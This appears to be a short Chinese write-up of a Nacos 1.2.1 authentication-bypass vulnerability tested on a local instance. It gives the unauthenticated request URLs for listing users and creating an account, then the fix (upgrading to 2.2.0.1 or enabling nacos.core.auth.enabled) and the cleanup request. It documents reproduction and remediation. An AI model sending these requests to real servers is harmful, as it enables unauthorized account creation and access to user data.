Nacos 身份认证绕过漏洞(已修复)

Nacos存在权限绕过漏洞,攻击者利用该漏洞可以未授权访问用户列表(我的Nacos版本为1.2.1)

漏洞复现:
http://127.0.0.1:8849/nacos/v1/auth/users?pageNo=1&pageSize=9

利用漏洞复现问题
http://127.0.0.1:8849/nacos/v1/auth/users?username=test1&password=test1
可以这样创建用户


使用该账号发现可以登录账号

  1. 漏洞修复:

  2. 1.将Nacos升级到2.2.0.1或以上版本

  3. 2.此版本nacos配置文件开启鉴权,(默认是不开启的)nacos.core.auth.enabled=true 

  4. 重新启动Nacos,再次测试:

    测试完成,将创建的用户删除:
    http://127.0.0.1:8849/nacos/v1/auth/users?username=test1